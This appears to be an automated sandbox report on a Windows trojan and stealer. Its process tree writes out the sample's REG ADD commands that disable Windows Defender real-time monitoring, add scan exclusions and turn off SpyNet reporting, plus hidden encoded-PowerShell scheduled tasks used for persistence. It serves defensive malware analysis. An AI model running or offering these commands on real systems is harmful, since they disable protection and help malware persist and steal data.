4b93b47dd152efc8ee60e0d94c2ba18874a34a454537f2b7b8486c2857a838e0

Analysis

max time kernel
151s
max time network
159s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
12/10/2022, 07:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.3MB
MD5

938328702eae370464559d8c79e85a3d
SHA1

81804990ab351d1d0dad17dcbbe83f416dae2b2f
SHA256

4b93b47dd152efc8ee60e0d94c2ba18874a34a454537f2b7b8486c2857a838e0
SHA512

f9934a76e04c446e6bc1ce8ebb20e82b832000c005d70605b8582739b11a16301a24a2af7b8d826275d0fcc792a12beea563d75a9b67acdb819dd4479d1975a9
SSDEEP

196608:91OE3WKUKQ4k3vxfyYaX8QI6REG/SxDWPGJrUB:3OsWKUyYfyYaMAyGODWcrG

Score

10^/10

evasion spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hrOORTLiECQfZJVB = "0"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\YSrBLfWUtIHnuviW = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\YSrBLfWUtIHnuviW = "0"	schtasks.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RqtPwFqMTiUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oXjeNNLqKAotC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\YSrBLfWUtIHnuviW = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UBqYudvSNocU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	schtasks.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\YSrBLfWUtIHnuviW = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZUXSmeDRU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hrOORTLiECQfZJVB = "0"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xonCRuklPFipnPeqKpR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UBqYudvSNocU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oXjeNNLqKAotC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RqtPwFqMTiUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZUXSmeDRU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xonCRuklPFipnPeqKpR = "0"	reg.exe

Executes dropped EXE 4 IoCs

pid	Process
1620	Install.exe
1704	Install.exe
1796	nCUtXPa.exe
1996	WHCBjUJ.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Loads dropped DLL 8 IoCs

pid	Process
1612	file.exe
1620	Install.exe
1620	Install.exe
1620	Install.exe
1620	Install.exe
1704	Install.exe
1704	Install.exe
1704	Install.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops file in System32 directory 9 IoCs

description	ioc	Process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	nCUtXPa.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	nCUtXPa.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	nCUtXPa.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	WHCBjUJ.exe

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	WHCBjUJ.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	WHCBjUJ.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	WHCBjUJ.exe
File created	C:\Program Files (x86)\ZUXSmeDRU\EJEbrU.dll	WHCBjUJ.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	WHCBjUJ.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\MFUxwpyluZmBswWip.job	schtasks.exe
File created	C:\Windows\Tasks\SEVCueFJyRflUhU.job	schtasks.exe
File created	C:\Windows\Tasks\bKwcWZekAnYWEgmozo.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1524	schtasks.exe
1576	schtasks.exe
1232	schtasks.exe
1700	schtasks.exe
2028	schtasks.exe
1536	schtasks.exe
920	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 19 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	WHCBjUJ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	WHCBjUJ.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	WHCBjUJ.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	WHCBjUJ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	WHCBjUJ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	WHCBjUJ.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	WHCBjUJ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	WHCBjUJ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	WHCBjUJ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	WHCBjUJ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
1064	powershell.EXE
1064	powershell.EXE
1064	powershell.EXE
1764	powershell.EXE
1764	powershell.EXE
1764	powershell.EXE
1944	powershell.EXE
1944	powershell.EXE
1944	powershell.EXE
908	powershell.EXE
908	powershell.EXE
908	powershell.EXE
1996	WHCBjUJ.exe
1996	WHCBjUJ.exe
1996	WHCBjUJ.exe
1996	WHCBjUJ.exe
1996	WHCBjUJ.exe
1996	WHCBjUJ.exe
1996	WHCBjUJ.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1064	powershell.EXE
Token: SeDebugPrivilege	1764	powershell.EXE
Token: SeDebugPrivilege	1944	powershell.EXE
Token: SeDebugPrivilege	908	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1612 wrote to memory of 1620	1612	file.exe	26
PID 1612 wrote to memory of 1620	1612	file.exe	26
PID 1612 wrote to memory of 1620	1612	file.exe	26
PID 1612 wrote to memory of 1620	1612	file.exe	26
PID 1612 wrote to memory of 1620	1612	file.exe	26
PID 1612 wrote to memory of 1620	1612	file.exe	26
PID 1612 wrote to memory of 1620	1612	file.exe	26
PID 1620 wrote to memory of 1704	1620	Install.exe	27
PID 1620 wrote to memory of 1704	1620	Install.exe	27
PID 1620 wrote to memory of 1704	1620	Install.exe	27
PID 1620 wrote to memory of 1704	1620	Install.exe	27
PID 1620 wrote to memory of 1704	1620	Install.exe	27
PID 1620 wrote to memory of 1704	1620	Install.exe	27
PID 1620 wrote to memory of 1704	1620	Install.exe	27
PID 1704 wrote to memory of 1120	1704	Install.exe	29
PID 1704 wrote to memory of 1120	1704	Install.exe	29
PID 1704 wrote to memory of 1120	1704	Install.exe	29
PID 1704 wrote to memory of 1120	1704	Install.exe	29
PID 1704 wrote to memory of 1120	1704	Install.exe	29
PID 1704 wrote to memory of 1120	1704	Install.exe	29
PID 1704 wrote to memory of 1120	1704	Install.exe	29
PID 1704 wrote to memory of 860	1704	Install.exe	31
PID 1704 wrote to memory of 860	1704	Install.exe	31
PID 1704 wrote to memory of 860	1704	Install.exe	31
PID 1704 wrote to memory of 860	1704	Install.exe	31
PID 1704 wrote to memory of 860	1704	Install.exe	31
PID 1704 wrote to memory of 860	1704	Install.exe	31
PID 1704 wrote to memory of 860	1704	Install.exe	31
PID 860 wrote to memory of 316	860	forfiles.exe	33
PID 860 wrote to memory of 316	860	forfiles.exe	33
PID 860 wrote to memory of 316	860	forfiles.exe	33
PID 860 wrote to memory of 316	860	forfiles.exe	33
PID 860 wrote to memory of 316	860	forfiles.exe	33
PID 860 wrote to memory of 316	860	forfiles.exe	33
PID 860 wrote to memory of 316	860	forfiles.exe	33
PID 1120 wrote to memory of 1764	1120	forfiles.exe	34
PID 1120 wrote to memory of 1764	1120	forfiles.exe	34
PID 1120 wrote to memory of 1764	1120	forfiles.exe	34
PID 1120 wrote to memory of 1764	1120	forfiles.exe	34
PID 1120 wrote to memory of 1764	1120	forfiles.exe	34
PID 1120 wrote to memory of 1764	1120	forfiles.exe	34
PID 1120 wrote to memory of 1764	1120	forfiles.exe	34
PID 1764 wrote to memory of 632	1764	cmd.exe	35
PID 1764 wrote to memory of 632	1764	cmd.exe	35
PID 1764 wrote to memory of 632	1764	cmd.exe	35
PID 1764 wrote to memory of 632	1764	cmd.exe	35
PID 1764 wrote to memory of 632	1764	cmd.exe	35
PID 1764 wrote to memory of 632	1764	cmd.exe	35
PID 1764 wrote to memory of 632	1764	cmd.exe	35
PID 316 wrote to memory of 816	316	cmd.exe	36
PID 316 wrote to memory of 816	316	cmd.exe	36
PID 316 wrote to memory of 816	316	cmd.exe	36
PID 316 wrote to memory of 816	316	cmd.exe	36
PID 316 wrote to memory of 816	316	cmd.exe	36
PID 316 wrote to memory of 816	316	cmd.exe	36
PID 316 wrote to memory of 816	316	cmd.exe	36
PID 316 wrote to memory of 1052	316	cmd.exe	37
PID 316 wrote to memory of 1052	316	cmd.exe	37
PID 316 wrote to memory of 1052	316	cmd.exe	37
PID 316 wrote to memory of 1052	316	cmd.exe	37
PID 316 wrote to memory of 1052	316	cmd.exe	37
PID 316 wrote to memory of 1052	316	cmd.exe	37
PID 316 wrote to memory of 1052	316	cmd.exe	37
PID 1764 wrote to memory of 1604	1764	cmd.exe	38

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1612
- C:\Users\Admin\AppData\Local\Temp\7zS822B.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1620
- - C:\Users\Admin\AppData\Local\Temp\7zS90FA.tmp\Install.exe
    .\Install.exe /S /site_id "525403"
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:1704
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1120
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1764
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:632
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:1604
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:860
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:316
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        
        PID:816
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:1052
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gTwhkNmRK" /SC once /ST 04:24:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:1232
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gTwhkNmRK"
      4⤵
      PID:1992
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gTwhkNmRK"
      4⤵
      PID:788
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bKwcWZekAnYWEgmozo" /SC once /ST 09:11:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\nCUtXPa.exe\" q8 /site_id 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Creates scheduled task(s)
      PID:1700

C:\Windows\system32\taskeng.exe
taskeng.exe {C6CEFF1E-175C-4944-9999-9CE22B21433F} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
1⤵
PID:1380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1064
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1536
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1764
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1520
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1944
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:816
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:908
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1540

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:920

C:\Windows\system32\taskeng.exe
taskeng.exe {88225B4C-11EE-4BC1-9F29-BCD9BB41342E} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:944
- C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\nCUtXPa.exe
  C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\nCUtXPa.exe q8 /site_id 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:1796
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gjNuzNpvY" /SC once /ST 08:54:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2028
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gjNuzNpvY"
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gjNuzNpvY"
    3⤵
    PID:520
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:764
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1292
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1648
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1476
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gFyLnNRrE" /SC once /ST 03:48:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1536
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gFyLnNRrE"
    3⤵
    PID:1860
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gFyLnNRrE"
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1668
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:656
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1504
